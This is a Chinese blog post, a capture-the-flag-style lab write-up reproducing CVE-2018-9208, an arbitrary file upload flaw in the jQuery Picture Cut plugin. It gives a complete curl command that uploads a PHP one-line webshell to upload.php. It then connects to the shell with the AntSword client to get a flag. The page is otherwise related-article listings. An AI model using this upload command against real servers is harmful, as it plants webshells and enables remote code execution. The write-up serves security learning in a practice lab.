漏洞复现-jquery-picture-cut 任意文件上传_(CVE-2018-9208)

最新推荐文章于 2024-04-11 07:35:34 发布
最新推荐文章于 2024-04-11 07:35:34 发布
阅读量592 收藏
点赞数
分类专栏: 漏洞复现 文章标签: jquery 前端 javascript 安全 web安全 安全威胁分析 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134073459
版权

jquery-picture-cut 任意文件上传_(CVE-2018-9208)

漏洞信息

  • jQuery Picture Cut v1.1以下版本中存在安全漏洞
  • CVE-2018-9208
  • 文件上传漏洞

描述

​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

访问首页

image-20231027115056615

使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置

jquery-picture-cut/src/php/upload.php

curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@yijuhua.php" http://10.9.47.6:56174//jquery-picture-cut/src/php/upload.php

image-20231027115508665

使用中国蚁剑连接

http://10.9.47.6:56174/yijuhua.php

image-20231027115602804

获取flag

image-20231027115638391

order libra
关注
专栏目录
漏洞复现jquery 文件上传CVE-2018-9207|CVE-2018-9208
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-21 860
core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
基于JavaScript的框架漏洞_javascript框架库漏洞(1)
m0_60607245的博客
04-09 617
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
jQuery文件上传漏洞(CVE-2018-9207)
m0_49025459的博客
12-06 836
漏洞描述 jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File
文件上传漏洞
m0_73452266的博客
06-27 511
文件上传漏洞的原理,木马的知识,前端,后端和服务器配置漏洞文件上传绕过
jquery 文件上传漏洞CVE-2018-9207)
ak.Gh0st的博客
10-31 765
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
基于JavaScript的框架漏洞_javascript框架库漏洞(2)
m0_60607245的博客
04-09 1002
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
jquery-picture-cut 任意文件上传CVE-2018-9208
ak.Gh0st的博客
10-31 847
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
标题中的"CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999"提及了几个关键概念,首先,CVE(Common Vulnerabilities and Exposures)是用于识别网络安全漏洞的标准化系统。"CVE-2018-9995"指的是...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
jquery 文件上传CVE-2018-9207)漏洞复现
weixin_42675091的博客
09-03 2849
jquery 文件上传CVE-2018-9207)漏洞复现
CVE-2018-9207 jQuery文件上传漏洞复现
LM01的博客
06-04 1710
CVE-2018-9207 jQuery文件上传漏洞复现
jQuery-File-Upload—三个漏洞的故事
热门推荐
一个码农的笔记
01-11 3万+
翻译自:https://blog.detectify.com/2018/12/13/jquery-file-upload-a-tale-of-three-vulnerabilities/ 翻译:聂心明 在github上星个数第二多的JavaScript项目中有两个远程命令执行漏洞,并且星数第三多的那个项目可能会通过jQuery-File-Upload任意删掉被上传的文件。后者是有意的行为,我们的安...
Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-31 1395
Weblogic受影响的版本:此次我们使用的是vnlhub靶场搭建的环境,是vnlhub中的Weblogic漏洞中的CVE-2018-2894靶场,我们 cd 到 CVE-2018-2894,然后输入以下命令启动靶场环境: 输入以下的命令可以查看当前启动的靶场环境: 我们首先通过以下的命令获取Weblogic后台登陆的用户名和密码 然后我们通过URL访问靶场界面然后我们通过用户名weblogic和刚刚获得密码QghFSif4登陆Weblogic后台界面如图,是我们登陆后的界面:登录到后台,我们按照登录 ->
漏洞复现-jquery-文件上传】vulfocus/jquery-cve_2018_9207
10-07 2128
jquery-文件上传
jquery-picture-cut 任意文件上传(CVE-2018-9208)
m0_65150886的博客
01-02 498
picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。2.准备一句话木马文件 1.php
基于JavaScript的框架漏洞
weixin_68408599的博客
12-09 2780
本文章是基于JavaScript框架的漏洞,相关靶场均在vulhub靶场,此文章只供于学习讨论。
基于JavaScript的框架漏洞_javascript框架库漏洞,2024年最新网络安全面试必问的HashMap
最新发布
2401_84254364的博客
04-11 975
这个漏洞产生主要是因为jQuery-File-Upload的**.htaccess文件会限制文件的上传和文件的执行,但是Apache的2.3.9版本中,Apache默认不再支持.htaccess了,而且默认是没有被开启的,所以导致攻击者可以任意上传脚本文件并执行。如果使用了另一种web容器的话(比如Nginx),那么基于.htaccess文件的保护则完全无效。**
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值